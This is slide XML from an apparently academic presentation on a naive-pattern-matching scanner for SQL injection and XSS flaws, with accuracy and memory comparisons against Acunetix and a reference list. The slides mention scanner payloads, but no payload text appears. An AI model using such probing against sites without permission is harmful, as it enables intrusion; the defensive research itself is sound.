            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7951955" y="3364841"/>
            <a:ext cx="140812" cy="2416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6AFB674-9403-4C23-A4B5-CDD70B83DEBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9523669" y="3362277"/>
            <a:ext cx="140812" cy="2416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545C3ED-68AE-4C99-AD54-FB5742FEFB3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10908945" y="3316917"/>
            <a:ext cx="140812" cy="2416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07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27" y="136525"/>
            <a:ext cx="10846870" cy="109551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(Vulnerable URLs with attack patterns in case of blind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injection 		      shown as text file )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581DA-BF73-4A75-912C-CAAF6DC80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42" y="1232035"/>
            <a:ext cx="8807115" cy="53841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5364AC-A85A-4C50-B680-3911A7F97791}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3354235" y="4521058"/>
            <a:ext cx="468152" cy="2433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3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16" y="136525"/>
            <a:ext cx="11652984" cy="109551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(Testing URLs with XSS payloads for Cross Site Scripting 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602F4-49FE-4FA0-BEB6-791543FE4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50" y="1154716"/>
            <a:ext cx="8807115" cy="5384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2819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88B0-285E-456A-BE7D-F1011418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95D8C-FD39-4176-9191-E7F487102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positive, true negative, false positive, and false negative rate.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correctness of vulnerability detection.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the commercial tool,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Acunetix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was compared to the result of proposed system.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EC7E-2EA7-49E4-95D8-CB886AFA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D8CA8-B19E-4C44-A4C7-51C832C2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E18CF-786C-48EC-B6EA-2A3621BEB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is the weak point of the web application caused by unawareness of the developers.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vulnerability is required for web application because of avoiding that unauthorized persons gain unauthorized access from web application.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XSS_SQL_Scanning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algorithm can assists in vulnerability detection with a low rate of false negative and false positive.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searching payloads in response,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algorithm </a:t>
            </a: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the Naïve pattern matching algorithm because it is simple and the system response message is also short.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 summary, this proposed system protects the web application from the strike of attacks by discovering the vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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697D5-DBB3-499B-B89C-A7D69765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84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3049-D617-4F5D-B93F-3BC230CE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12FE-A7F1-4C5B-B812-42B3869AD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4" y="1247775"/>
            <a:ext cx="11106151" cy="5743575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1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31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Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Scanner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effective web security scanner that can accurately detect over 7000 vulnerabilities in many websites.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also an automated tool for testing web application security.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detect vulnerabilities more than other web security scanners with a fewer false positive because it uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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AcuSensor</a:t>
            </a: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technology. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1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b="1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1156-61B1-4694-B61C-3A98D25F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43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3876-EDC5-48E8-8A3B-6A26ABB0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B22D9-F4E8-4B49-8185-7653CC7B1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contingency table used to evaluated the result of the system is shown in TABLE Ⅰ.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9B378-063E-4E92-BF2C-1DC3C1F6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C9D14-A775-4526-94E9-3340E22DD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06" y="2880614"/>
            <a:ext cx="5552388" cy="1637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42E2B-4AE8-4B43-A183-D50E441B5549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2170569" y="4697412"/>
            <a:ext cx="7850862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800"/>
              <a:tabLst>
                <a:tab pos="685800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" cap="small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TABLE Ⅰ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="small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Specification of  true positive, false positive, true negative and false negative rate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="674248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3049-D617-4F5D-B93F-3BC230CE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12FE-A7F1-4C5B-B812-42B3869AD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4" y="1247775"/>
            <a:ext cx="11106151" cy="5743575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1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31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 (TP)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proposed system can accurately detect the vulnerability when the website is actually vulnerable. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1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31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Negative (TN)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cannot actually detect the vulnerability when the website is not vulnerable.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1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31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(FP)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can detect vulnerability while the website has no vulnerability. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1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31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 (FP)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cannot detect vulnerability but there is actually the vulnerability in the website.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b="1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1156-61B1-4694-B61C-3A98D25F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72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4925-4892-40AB-AB3C-23761E20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206C-2D6F-4FD1-A2C6-460FDC053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Acunetix’s</a:t>
            </a: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 showed that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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www.example.com</a:t>
            </a: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had SQL injection vulnerability and the proposed system also showed that this website had SQL injection vulnerability.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showed that </a:t>
            </a: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result.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Thus, it could be said </a:t>
            </a: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 (TP).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Negative (TN), False Positive (FP) and False Negative (FN) were calculated in this way.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FAC2C-66B2-40FD-B5A7-93ECD4D5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0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DD21-E6BA-4C98-BF13-E1C99234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B01E-EDA8-4B66-96E2-4E865127A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evaluation these result,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firstly </a:t>
            </a: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 201 URLs </a:t>
            </a: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web applications.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examined these URLs </a:t>
            </a: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corresponding type of vulnerabilities. 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kept the results </a:t>
            </a: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database.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examining, the well-known tool, </a:t>
            </a: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Acunetix</a:t>
            </a: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been chosen to </a:t>
            </a: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quantify the accuracy of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1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XSS_SQL_Scanning</a:t>
            </a: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b="1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3EC33-2E05-4F5D-9820-C7D0C3AB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05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1778-908C-4F83-AB5A-A2563A29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2F98-499A-482B-B51B-DFF012CE4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of proposed system was calculated by the following equation and the result is shown in TABLE Ⅱ.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3316A-C64F-4700-9056-9CC29556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0FF6B-92AB-4B80-942F-B1CCF5F24972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2755282" y="3027490"/>
            <a:ext cx="668143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((TPR+TNR)/(TPR+FPR+TNR+FNR))*100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1B37B-0180-41BE-9CA5-E40721F2B4F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4244879" y="6168784"/>
            <a:ext cx="3702240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800"/>
              <a:tabLst>
                <a:tab pos="685800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" cap="small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TABLE Ⅱ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="small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Accuracy for proposed system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BD6F8E-A1A6-43A9-9F16-C92F02A76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845668"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3606799" y="3521091"/>
          <a:ext cx="4978400" cy="2433399"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2938466">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3290812953"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2039934">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2815610674"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3172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Measure</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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Value (%)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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0111"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4232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True Positive Rate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100.0%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705790"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4232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False Positive Rate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2.0833%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201625"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4232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True Negative Rate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97.916%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02809"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4232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False Negative Rate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0.0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947864"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4232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Accuracy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Myanmar Text" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>99.50495%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75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84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B9C7-38E0-48E3-A76E-B351333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FB84F-1AE2-4605-B67B-420754AE5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 illustrates the calculated rate results between the system and Acunetix based on 201 URLs.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A55D8-B5AB-4004-AB7A-1AB8B1E3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45289-77C9-4430-A361-6166ED4C9388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2688728" y="5982324"/>
            <a:ext cx="7293472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800"/>
              <a:tabLst>
                <a:tab pos="685800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" cap="small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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" cap="small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11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" cap="small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en-US" sz="1400" cap="small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Comparison of detection results between the system and Acunetix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0A81-2707-4213-AA50-497D96C75C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0" y="2933700"/>
            <a:ext cx="4406900" cy="264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8438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5792-39D8-40FC-A8CB-FBB6CEDC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A9B3-F6B1-4C99-AB8E-2FE2EF91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is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201 URLs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both system.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this table and column chart, proposed system has 100% of true positive, 2% of false positive, 97% of true negative, 0% of false negative, and then  99% accuracy which is compared with Acunetix.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of these two methods had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154 URLs </a:t>
            </a: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true positive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 URLs </a:t>
            </a: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true negative, and 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URL </a:t>
            </a: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false positive, and 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URL in false negative.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CF232-DA53-4A60-87BC-0106F96A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79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5792-39D8-40FC-A8CB-FBB6CEDC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A9B3-F6B1-4C99-AB8E-2FE2EF91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processing time for the system was measured in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seconds.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caused by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crawled URL result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input points of injection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each crawled web page.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generally took 15 seconds to crawl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b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URL</a:t>
            </a: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includes 335 linked URL and the time for detection process was less than 200 seconds. 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CF232-DA53-4A60-87BC-0106F96A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10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1778-908C-4F83-AB5A-A2563A29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2F98-499A-482B-B51B-DFF012CE4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memory usage of the proposed system and Acunetix is described in TABLE Ⅲ.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proposed system saved 66.6 MB and helped to decrease the memory usage.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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3316A-C64F-4700-9056-9CC29556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1B37B-0180-41BE-9CA5-E40721F2B4F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3255912" y="3719354"/>
            <a:ext cx="5680171" cy="63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800"/>
              <a:tabLst>
                <a:tab pos="685800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" cap="small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TABLE Ⅲ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="small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Memory usage of proposed algorithm and acunetix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl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800"/>
              <a:tabLst>
                <a:tab pos="685800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="small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5048C69-54C3-46FA-9DB0-3910F0D5C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02294"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1565564" y="2778443"/>
          <a:ext cx="921327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71090">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3742597915"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3071090">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3247257762"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3071090">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3668142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Acunetix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(RAM)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23.3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10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7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A5AF-13A8-46CF-A97B-F7F856F4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65DFF-267B-4E71-AC53-5EC2093D8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discover the possibility of web application vulnerabilities.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assist web developers in detecting their web applications that have weaknesses or not.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support the security of web application.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the basic information on how to detect SQL injection and XSS attack for some people who begin to study the web application security.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33D67-DD23-47B3-B167-6AAECB59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84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16" y="136525"/>
            <a:ext cx="11652984" cy="109551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(Calculating the accuracy for the system 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69E65-257D-4AFE-B402-261A947DCE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26" y="865940"/>
            <a:ext cx="8793963" cy="5402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4665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318C-348D-4919-90C5-D4D82C5C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31A6-731F-453D-BC85-941DC891C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can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 all pages on the detected websites that have possible vulnerabilities for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SQL injection and Cross-Site Scripting (XSS) attack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users can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customize</a:t>
            </a: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the type of vulnerability, which is either SQL or XSS.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proposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>system</a:t>
            </a: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uplifts the accuracy</a:t>
            </a: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by reducing the rate of false positive and false negative when testing the vulnerability which make it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effective and reliable</a:t>
            </a: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website has the vulnerability, the users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easily find out which URL is vulnerable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other URLs.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users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quickly know how to fix the vulnerability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caused by SQL injection and XSS attack.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FDFDE-4EEC-4514-856F-C89BB1D5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91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318C-348D-4919-90C5-D4D82C5C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31A6-731F-453D-BC85-941DC891C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 proposed system supports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detail report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includes the vulnerable URLs, the list of fixing vulnerability and the processing time.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the proposed system is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customizable, applicable, reliable and lightweight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FDFDE-4EEC-4514-856F-C89BB1D5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85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E4B4-D48A-43DB-A349-E081BE14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01A73-2D35-4E7A-BF7A-E1E4D1FF2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system, XSS_SQL_Scanning Algorithm focuses on the detection of web applications vulnerability, particularly in two main types of attacks, which are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and Cross-site Scripting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uses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 (Uniform Resource Locator) as the input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detecting web application vulnerability.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It applies the Naïve algorithm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</a:t>
            </a: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search payloads in response</a:t>
            </a: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which make to be more lightweight the proposed algorithm.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experimental result of the proposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>system</a:t>
            </a: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produces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comparable result </a:t>
            </a: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with the commercial tool, Acunetix.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the memory usage of the proposed algorithm is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than Acunetix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3E8C1-2C7E-4C39-868C-D3F55161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77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318C-348D-4919-90C5-D4D82C5C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31A6-731F-453D-BC85-941DC891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proposed system helps </a:t>
            </a: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web developers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be secure their web application</a:t>
            </a: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from being attacked and also though who start to learn the security by showing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step by step of detection stages</a:t>
            </a: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FDFDE-4EEC-4514-856F-C89BB1D5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69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FEF7-E3F3-472F-8009-22810D17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and Future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0B95-0715-4947-917B-DAF08C2D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do not consider other web application vulnerabilities such as buffer overflow, cross site request forgery, command injection and so on.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will be dedicated to test with all vulnerabilities in websites and retain the low false positive and false negative rate.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/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BB51-0EBE-4A5C-94FF-197EAD9C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7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385B-5D1B-444D-97CF-275FDCB1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9FDD5-B2A4-4D0A-99E9-27B85B07C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57300" lvl="2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Teh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Faradilla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Abdul Rahman*,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Alya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Geogiana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Buja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Kamarularifin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Abd. Jalil,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Fakariah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Mohd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Ali, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i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“SQL Injection Attack Scanner Using Boyer-Moore String Matching Algorithm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Journal of Computers, Department of Computer, Technology and Network,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Universiti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MARA, Malaysia, December 26, 2015.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2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Priti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Singh,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Kirthika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Thevar, Pooja Shetty, Bushra Shaikh, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i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SQL Injection and XSS Vulnerability in Web Application”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International Journal of Engineering and Applied Sciences (IJEAS) ISSN: 2394-3661, Volume-2, Issue-3, March 2015.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2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Acunetix Web Security Blog, [online] available:  https://www.acunetix.com/blog/, visit on January 2019.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2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Simon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Wahstrom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“Evaluation of String Searching Algorithms”,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Mälardalen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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="19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Västerås</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="19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Sweden, 2012.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="18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endParaRPr lang="en-US" sz="16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just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="16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just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="16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endParaRPr lang="en-US" sz="16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2B26-C890-42C9-8DFC-80DB865F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385B-5D1B-444D-97CF-275FDCB1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9FDD5-B2A4-4D0A-99E9-27B85B07C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57300" lvl="2" indent="-34290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M.S. Jasmine,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Kirthiga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Devi,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Geogen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George, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i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Detecting XSS Based Web Application Vulnerabilities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       International Journal of Computer Technology &amp; Applications, Vol8(2),291-297,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Mälardalen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M. Tech (ISCF). Student, Department of Information Technology SRM University,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TamilNadu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India, March 2017.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-34290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Naïve Algorithm for pattern matching, [online]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available:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng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18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://www.geeksforgeeks.org/naive-algorithm-for-     pattern-searching/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visit on January 2019.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-34290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and Database Errors, [online] available:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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https://www.sqlinjection.net/errors/, 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 on January 2019.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="18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endParaRPr lang="en-US" sz="16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just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="16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just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="16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endParaRPr lang="en-US" sz="16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2B26-C890-42C9-8DFC-80DB865F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01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385B-5D1B-444D-97CF-275FDCB1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9FDD5-B2A4-4D0A-99E9-27B85B07C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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pP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Prakhar Tripathi and Rahul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Thingla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“Cross site scripting (XSS) and SQL-injection attack detection in web application”, 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Sustainable Computing in Science, Technology &amp; Management (SUSCOM-2019),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RajAvinash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 Singh and Sangita Roy,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asthan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Jaipur, India, February 26 - 28, 2019.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pP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Samira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Mehrnoosh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Behrooz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Shahi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Sheykhahmadloo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Abdolkhalegh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khandouzi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ghenare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800" i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and vulnerability detection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(IJCSIS) International Journal of Computer Science and Information Security, Vol. 11, No. 5, May 2013.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pP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Ain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Zubaidah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Mohd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Saleha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a*, Nur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Amizah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Rozalia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b*,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Alya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Geogiana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Bujaa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b, c*,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Kamarularifin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Abd.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Jalila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Fakariah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Hani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Mohd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Alia,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Teh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Faradilla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Abdul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Rahmana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c, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i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 Method for Web Application Vulnerabilities Detection by Using Boyer-Moore String Matching Algorithm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Information Systems International Conference (ISICO2015),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Universiti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MARA, Shah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800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sz="1800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40000, Selangor, 2015.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="18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endParaRPr lang="en-US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just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US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just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US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endParaRPr lang="en-US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2B26-C890-42C9-8DFC-80DB865F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06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385B-5D1B-444D-97CF-275FDCB1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9FDD5-B2A4-4D0A-99E9-27B85B07C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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1714500" lvl="3" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="11"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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OWASP Top Ten, [online] available: </a:t>
            </a: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https://owasp.org/www-project-top-ten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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/, visit on February 2019.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="11"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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José Fonseca, Marco Vieira, Henrique Madeira, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1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and comparing web vulnerability scanning tools for SQL injection and XSS attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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CISUC - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Polithecnic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err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Guarda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="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DEI/CISUC - University of Coimbra, Portugal, 2009.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="11"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800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endParaRPr lang="en-US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just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US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just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US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endParaRPr lang="en-US" dirty="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2B26-C890-42C9-8DFC-80DB865F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28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BC10C-2407-4A91-940A-A5D2BA0E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02D89-006D-445C-8293-41BEB838F493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="259800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Background Theory</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="4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8219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A0AE-03BB-4DC9-8432-3CDA0EB2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Schedule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043B-2801-4C29-B19F-1D01CFB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60</a:t>
            </a:fld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42E79E-30EA-4804-B3B3-25F23214E20F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="795181" y="2788549"/>
            <a:ext cx="1093801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Flowchart: Extract 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{289BFF56-853F-4384-B2E4-77547AD60EB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1487186" y="2810079"/>
            <a:ext cx="372718" cy="228599"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtra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Extract 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24608DCF-C929-48CE-BBDD-E6CF73349D4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5138572" y="2786891"/>
            <a:ext cx="372718" cy="228599"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtra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Extract 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEDAFDB5-FB55-4083-AD39-43BF83CD257A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3328407" y="2823334"/>
            <a:ext cx="372718" cy="228599"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtra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Extract 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75A90537-2A85-4620-85EE-FE083F1F67EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7008805" y="2788544"/>
            <a:ext cx="372718" cy="228599"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtra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Extract 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F0DF858-B6EF-4748-AA7B-2E255C634FEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10650663" y="2788544"/>
            <a:ext cx="372718" cy="228599"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtra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Extract 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
